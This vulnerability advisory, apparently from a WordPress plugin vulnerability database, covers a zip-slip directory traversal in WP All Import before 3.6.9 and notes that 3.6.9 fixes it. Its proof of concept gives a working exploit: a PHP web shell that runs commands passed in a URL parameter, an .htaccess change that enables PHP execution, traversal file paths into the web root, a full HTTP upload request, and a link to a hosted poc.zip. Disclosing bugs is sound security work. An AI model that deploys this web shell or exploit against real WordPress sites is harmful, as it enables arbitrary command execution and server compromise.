WordPress Plugin Vulnerabilities
WP All Import < 3.6.9 - Admin+ Directory traversal via file upload
Description
The plugin is not validating the paths of files contained in uploaded zip archives, allowing highly privileged users, such as admins, to write arbitrary files to any part of the file system accessible by the web server via a path traversal vector.
Proof of Concept
[1] Download 'poc.zip' via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip' poc.zip contains 2 files like below -> '../../../../../../../../../../var/www/html/exploit.php.txt' -> '../../../../../../../../var/www/html/.htaccess' [1-1] '../../../../../../../../../../var/www/html/exploit.php.txt' is as follows. ---------------------------------- <?php system($_GET['cmd']); ?> ---------------------------------- [1-2] '../../../../../../../../var/www/html/.htaccess' is as follows. ---------------------------------- <IfModule mod_rewrite.c> [same as the existing .htaccess data] AddHandler application/x-httpd-php .php .html </IfModule> ---------------------------------- [2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import' [3] Access 'http://localhost/exploit.php.txt?cmd=id' in order to execute arbitrary commands. [+++] PoC Request Packet Sample POST /wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=afb6fb6e5c HTTP/1.1 Host: localhost Content-Length: 1333 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhApgY7BhUu88AGu Accept: */* Origin: http://localhost Referer: http://localhost/wp-admin/admin.php?page=pmxi-admin-import Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [wordpress-admin-cookie] Connection: close ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name="name" poc.zip ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name="chunk" 0 ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name="chunks" 1 ------WebKitFormBoundaryrhApgY7BhUu88AGu Content-Disposition: form-data; name="async-upload"; filename="poc.zip" Content-Type: application/zip [poc.zip payload] [ - you can download it via 'https://github.com/lucy-official/TIL/raw/main/Security/Test%20Files/Zipslip/poc.zip'] ------WebKitFormBoundaryrhApgY7BhUu88AGu--
Affects Plugins
Fixed in version 3.6.9
References
Classification
Miscellaneous
Timeline
Publicly Published
2022-10-14 (about 3 months ago)
Added
2022-10-15 (about 3 months ago)
Last Updated
2022-10-17 (about 3 months ago)